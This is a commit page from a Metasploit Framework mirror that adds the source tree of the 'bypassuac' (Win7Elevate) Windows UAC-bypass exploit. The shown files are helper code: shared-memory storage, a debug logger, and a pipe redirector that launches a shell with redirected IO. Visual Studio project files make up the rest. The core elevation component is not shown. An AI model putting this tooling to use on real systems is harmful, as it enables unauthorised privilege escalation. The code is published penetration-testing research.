infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add bypassuac source to the tree 

git-svn-id: file:///home/svn/framework3/trunk@11484 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2011-01-06 17:30:20 +00:00
parent c003e4b8ef
commit 5d23306f01
35 changed files with 2587 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

231
external/source/exploits/bypassuac/CMMN.cpp vendored Normal file
View File

@ -0,0 +1,231 @@
#include "stdafx.h"
#include "CMMN.h"
#include <Shlobj.h>
#include <sstream>
#include <windows.h>
#include <WinIOCtl.h>
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CError::Format( DWORD ErrorCode )
{
return Format( ErrorCode, NULL, NULL );
}
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
{
LPVOID lpvMessageBuffer;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
NULL, ErrorCode,
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
(LPTSTR)&lpvMessageBuffer, 0, NULL);
std::wstring result;
std::wostringstream es(TEXT(""));
es << ErrorCode;
if ( Title )
{ result.append( Title ); result.append( TEXT("\n") ); }
else
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
if ( API )
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
if( lpvMessageBuffer )
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
if ( lpvMessageBuffer )
{ LocalFree(lpvMessageBuffer); }
return result;
}
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name, std::wstring& String)
{
CInterprocessStorage *storage = Create( Name );
if ( !storage )
return NULL;
storage->SetString( String );
return storage;
}
CInterprocessStorage *CInterprocessStorage::Create(const TCHAR *Name)
{
if ( !Name )
return NULL;
HANDLE hMap = CreateFileMapping( NULL, NULL, PAGE_READWRITE, 0, MaxSize, Name );
if ( hMap )
{
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
if ( view )
{
memset( view, 0, MaxSize );
return new CInterprocessStorage( Name, hMap, view );
}
CloseHandle( hMap );
}
return NULL;
}
CInterprocessStorage *CInterprocessStorage::Open(const TCHAR *Name)
{
if ( !Name )
return NULL;
HANDLE hMap = OpenFileMapping( FILE_MAP_ALL_ACCESS, TRUE, Name );
if ( hMap )
{
LPVOID view = MapViewOfFile( hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
if ( view )
return new CInterprocessStorage( Name, hMap, view );
CloseHandle( hMap );
}
return NULL;
}
CInterprocessStorage::CInterprocessStorage(const TCHAR *Name, HANDLE Mapping, LPVOID Base)
: _Name(Name), _hMapping(Mapping), _pBase(Base)
{
}
std::wstring CInterprocessStorage::GetName()
{
return std::wstring( _Name );
}
void CInterprocessStorage::GetString(std::wstring &String)
{
String.assign( reinterpret_cast<TCHAR *>(_pBase) );
}
void CInterprocessStorage::SetString(std::wstring &String)
{
size_t count = min( String.size(), MaxCount - 1 );
memcpy( _pBase, String.data(), count * sizeof(TCHAR) );
*(reinterpret_cast<TCHAR *>(_pBase) + count) = 0;
}
bool CInterprocessStorage::GetString( const TCHAR *Name, std::wstring& String )
{
CInterprocessStorage *storage = Open( Name );
if ( !storage )
return false;
storage->GetString( String );
delete storage;
return true;
}
CInterprocessStorage::~CInterprocessStorage()
{
UnmapViewOfFile( _pBase );
CloseHandle( _hMapping );
}
/*************************************************************************************************/
/*************************************************************************************************/
/*************************************************************************************************/
std::wstring CLogger::GetPath()
{
std::wstring path;
TCHAR buffer[MAX_PATH];
if ( GetTempPath( MAX_PATH, buffer ) )
{
path.assign( buffer );
path.append( TEXT("w7e.log") );
}
return path;
}
void CLogger::Reset()
{
DeleteFile( GetPath().c_str() );
}
void CLogger::LogLine( std::wstring& Text )
{
std::wstring tmp( Text.c_str() );
tmp.append( TEXT("\n") );
Log( tmp );
}
void CLogger::LogLine( )
{
Log( TEXT("\n") );
}
void CLogger::LogLine( const TCHAR *Text )
{
if ( Text )
LogLine( std::wstring( Text ) );
}
void CLogger::Log( const TCHAR Char )
{
std::wstring tmp;
tmp.append( &Char, 1 );
Log( tmp );
}
void CLogger::Log( const TCHAR *Text )
{
if ( Text )
Log( std::wstring( Text ) );
}
void CLogger::Log( std::wstring& Text )
{
TCHAR buffer[MAX_PATH];
//
// We have to check it every time to be reflective if user created this file
// while program was runnig.
//
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
{
std::wstring dbg( buffer );
dbg.append( TEXT(".debug") );
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if ( INVALID_HANDLE_VALUE == hdbg )
return;
CloseHandle( hdbg );
}
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
if( INVALID_HANDLE_VALUE != hFile )
{
SetFilePointer( hFile, 0, NULL, FILE_END );
DWORD written;
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
CloseHandle( hFile );
}
if ( mutex ) ReleaseMutex( mutex );
if ( mutex ) CloseHandle( mutex );
}

108
external/source/exploits/bypassuac/CMMN.h vendored Normal file
View File

@ -0,0 +1,108 @@
#pragma once
#include <windows.h>
#include <string>
//
// By Pavel
//
// This class is used for holding some data in the memory that can be accessed
// from any saparate process in the system by its name.
// It uses memeory mapped files with fixed size sections. Size is enough to hold
// as many chars as system supports for file paths.
//
// Once instance was created, it can be accessed from the another progect by the name.
// This shared object will be cleaned up when the last instance of this class will be destroyed
// across whole system.
//
// Generally, it is used following:
// 1. Create the first instance, set up data, keep it alive forever
// 2. Access to created object by its name from another prject by creating
// temporary instance of that object. After you dont need this object, destroy it.
//
class CInterprocessStorage {
public:
static const size_t MaxSize = MAX_PATH;
static const size_t MaxCount = MAX_PATH / sizeof(TCHAR);
//
// Creates initial named object or opens existing, incrementing its reference count.
// Resets all object's contents.
//
static CInterprocessStorage *Create( const TCHAR * Name );
//
// Creates initial named object or opens existing, incrementing its reference count,
// sets its value to the specified string
//
static CInterprocessStorage *Create( const TCHAR * Name, std::wstring& String );
//
// Opens existing named object. Does not modify its data.
//
static CInterprocessStorage *Open( const TCHAR * Name );
//
// Queries object's name.
//
std::wstring GetName();
//
// Queries object's value
//
void GetString( std::wstring& String );
//
// Tries to get named object's value, accessing one by the name.
//
static bool GetString( const TCHAR *Name, std::wstring& String );
//
// Sets object's Value
//
void SetString( std::wstring& String );
~CInterprocessStorage();
private:
const HANDLE _hMapping;
const LPVOID _pBase;
const TCHAR *_Name;
CInterprocessStorage( const TCHAR *Name, HANDLE Mapping, LPVOID Base );
};
//
// Logs data to file.
// Log takes place ony if one special file exists. File is named as its hosting application
// appended by .debug
// Example: Code runs in the explorer.exe => log will be allowed if near the exe
// will be placed file explorer.exe.debug
//
// It uses mutual execution to prevent unreadable content of the log file.
// Log file has path = %temp%w7e.og
//
// FILE_FLAG_WRITE_THROUGH flag is used to prevent log to be unsaved if application crashed.
//
class CLogger {
public:
static void LogLine( std::wstring& Text );
static void LogLine( const TCHAR *Text );
static void LogLine( );
static void Log( std::wstring& Text );
static void Log( const TCHAR *Text );
static void Log( const TCHAR Char );
static void Reset( );
private:
static std::wstring GetPath();
};
//
// Formats system error codes that were obtained by calling GetLastError.
//
class CError {
public:
static std::wstring Format( DWORD ErrorCode );
static std::wstring Format( DWORD ErrorCode, const TCHAR *Title, const TCHAR *API );
};

99
external/source/exploits/bypassuac/Redirector.cpp vendored Normal file
View File

@ -0,0 +1,99 @@
#include "stdafx.h"
#include "CMMN.h"
#include "Redirector.h"
#include <windows.h>
const TCHAR *STDIn_PIPE = TEXT("\\\\.\\pipe\\TIOR_In");
const TCHAR *STDOut_PIPE = TEXT("\\\\.\\pipe\\TIOR_Out");
const TCHAR *STDErr_PIPE = TEXT("\\\\.\\pipe\\TIOR_Err");
DWORD WINAPI Redirector( LPVOID Parameter )
{
assert( Parameter );
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
CLogger::Log( TEXT("Hello redirector thread: ") );
CLogger::LogLine( pair->Name );
CHAR read_buff[2];
DWORD nBytesRead,nBytesWrote;
bool was_0d = false;
bool error = false;
while ( ! error )
{
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("ReadFile") ) );
error = true && (!pair->KeepAlive);
break;
}
if ( pair->Linux )
{
if ( ! was_0d )
{
if ( read_buff[0] == 0xa )
{
read_buff[0] = 0xd;
read_buff[1] = 0xa;
nBytesRead = 2;
}
}
was_0d = read_buff[nBytesRead - 1] == 0x0d;
}
for ( DWORD i = 0; i < nBytesRead; i++ )
{
if ( pair->DestinationConsole )
{
//
// Emulate console input.
//
INPUT_RECORD inp = {0};
inp.EventType = KEY_EVENT;
inp.Event.KeyEvent.uChar.AsciiChar = read_buff[i];
inp.Event.KeyEvent.wRepeatCount = 1;
inp.Event.KeyEvent.wVirtualKeyCode = 0;
inp.Event.KeyEvent.wVirtualScanCode = 0;
inp.Event.KeyEvent.bKeyDown = TRUE;
inp.Event.KeyEvent.dwControlKeyState = 0;
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteConsoleInput") ) );
error = true && (!pair->KeepAlive);
break;
}
}
else
{
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
pair->Name.c_str(),
TEXT("WriteFile") ) );
error = true && (!pair->KeepAlive);
break;
}
}
}
}
CLogger::Log( TEXT("Bye redirector thread: ") );
CLogger::LogLine( pair->Name );
return EXIT_SUCCESS;
}

44
external/source/exploits/bypassuac/Redirector.h vendored Normal file
View File

@ -0,0 +1,44 @@
#pragma once
#include <stdio.h>
#include <tchar.h>
#include <string>
#include <windows.h>
//
// By Pavel
//
// Defines names of pipes that can be accessed by name for redirecting IO.
//
const extern TCHAR *STDIn_PIPE;
const extern TCHAR *STDOut_PIPE;
const extern TCHAR *STDErr_PIPE;
//
// Structure that is passed to newly created thread.
// Defines how to redirect IO
//
typedef struct _TRedirectorPair {
HANDLE Source;
HANDLE Destination;
//
// Uses directly Console IO instead of ReadFile and WriteFile
//
bool DestinationConsole;
HANDLE Thread;
//
// If true, prevent thread's exit on any IO error.
//
bool KeepAlive;
std::wstring Name;
//
// Appends 0x0A which is the one line terminator for linux with 0x0D. ( \r \n escapes)
//
bool Linux;
}TRedirectorPair;
DWORD WINAPI Redirector( LPVOID Parameter );

147
external/source/exploits/bypassuac/TIOR/TIOR.cpp vendored Normal file
View File

@ -0,0 +1,147 @@
#include "stdafx.h"
#include <windows.h>
#include ".\..\Redirector.h"
#include ".\..\CMMN.h"
//
// By Pavels
//
// This application is used for redirection data from the console to the pipes,
// not useng pipes at the other side.
// It is caused by some differences when using some other proceses which
// also redirect data. Main reason is differences in ReadConsole and ReadFile
// methods.
// Using this redirector app, child process will never know that his parent redirects it's IO.
//
// Everything is asynchronous. 3 Threads.
//
int _tmain(int argc, _TCHAR* argv[])
{
CLogger::LogLine(TEXT("TIOR: Hello"));
TRedirectorPair in = {0};
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
//in.KeepAlive = true;
in.Name.assign(TEXT("TIOR: [in]"));
if ( INVALID_HANDLE_VALUE != in.Source )
{
in.Destination = GetStdHandle( STD_INPUT_HANDLE );
in.DestinationConsole = true;
if ( INVALID_HANDLE_VALUE != in.Destination )
in.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&in, 0, NULL);
}
TRedirectorPair out = {0};
out.Destination = CreateFile( STDOut_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
out.KeepAlive = true;
out.Name.assign(TEXT("TIOR: [out]"));
if ( INVALID_HANDLE_VALUE != out.Destination )
{
SECURITY_ATTRIBUTES sa;
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
HANDLE tmp;
CreatePipe(&out.Source,&tmp,&sa,0);
SetStdHandle( STD_OUTPUT_HANDLE, tmp );
out.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&out, 0, NULL);
}
TRedirectorPair err = {0};
err.Destination = CreateFile( STDErr_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
err.KeepAlive = true;
err.Name.assign(TEXT("TIOR: [err]"));
if ( INVALID_HANDLE_VALUE != err.Destination )
{
SECURITY_ATTRIBUTES sa;
sa.nLength= sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
HANDLE tmp;
CreatePipe(&err.Source,&tmp,&sa,0);
SetStdHandle( STD_ERROR_HANDLE, tmp );
err.Thread = CreateThread( NULL , 0, Redirector, (LPVOID)&err, 0, NULL);
}
///////////////////////////////////////////////////////////////////////////////////
//
// Obtainig information about process to start and redirect
//
std::wstring shell, args, dir;
CInterprocessStorage::GetString( TEXT("w7e_TIORShell"), shell );
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
STARTUPINFO si = {0};si.cb = sizeof(si);
PROCESS_INFORMATION pi = {0};
BOOL created = CreateProcess(
shell.c_str(),
const_cast<TCHAR *>(args.c_str()),
NULL,
NULL,
TRUE,
0,
NULL,
dir.c_str(),
&si,
&pi );
if ( ! created )
{
CLogger::LogLine(
CError::Format(
GetLastError(),
TEXT("TIOR: Unable to create child process"),
TEXT("CreateProcess")));
return EXIT_FAILURE;
}
else
{
CloseHandle( pi.hThread );
}
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
//
// Waiting for eny handle to be freed.
// Either some IO thread will die or process will be oevered.
//
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
//
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
// Thats why we wait again for some period of time reading died process's output untill the end.
//
WaitForMultipleObjects( 3, waiters + 1, FALSE, 1000 );
//
// Dont forget to close child process. We need to be sure, if user terminated app which
// reads our redirected data, we terminate the target child app.
//
CLogger::LogLine(TEXT("TIOR: Killing child process"));
TerminateProcess( pi.hProcess, EXIT_FAILURE );
CloseHandle( pi.hProcess );
CLogger::LogLine(TEXT("TIOR: Exit"));
//
// I will not close any handles here - system will terminate and close all by it self.
//
return EXIT_SUCCESS;
}

175
external/source/exploits/bypassuac/TIOR/TIOR.vcxproj vendored Normal file
View File

@ -0,0 +1,175 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B36517F4-984C-422C-ADF9-85D5ACD4E30B}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>TIOR</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\CMMN.cpp" />
<ClCompile Include="..\Redirector.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="TIOR.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

39
external/source/exploits/bypassuac/TIOR/TIOR.vcxproj.filters vendored Normal file
View File

@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="TIOR.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\CMMN.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\Redirector.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

3
external/source/exploits/bypassuac/TIOR/TIOR.vcxproj.user vendored Normal file
View File

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
</Project>

8
external/source/exploits/bypassuac/TIOR/stdafx.cpp vendored Normal file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// TIOR.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

16
external/source/exploits/bypassuac/TIOR/stdafx.h vendored Normal file
View File

@ -0,0 +1,16 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
// TODO: reference additional headers your program requires here
#include <assert.h>

8
external/source/exploits/bypassuac/TIOR/targetver.h vendored Normal file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

60
external/source/exploits/bypassuac/Win7Elevate.sln vendored Normal file
View File

@ -0,0 +1,60 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
ProjectSection(SolutionItems) = preProject
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
EndProjectSection
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TIOR", "TIOR\TIOR.vcxproj", "{B36517F4-984C-422C-ADF9-85D5ACD4E30B}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7ElevateDll", "Win7ElevateDll\Win7ElevateDll.vcxproj", "{A1814C92-4DA6-440C-811E-86016AB7433A}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\Win7Elevate.vcxproj", "{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}"
ProjectSection(ProjectDependencies) = postProject
{A1814C92-4DA6-440C-811E-86016AB7433A} = {A1814C92-4DA6-440C-811E-86016AB7433A}
{B36517F4-984C-422C-ADF9-85D5ACD4E30B} = {B36517F4-984C-422C-ADF9-85D5ACD4E30B}
EndProjectSection
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
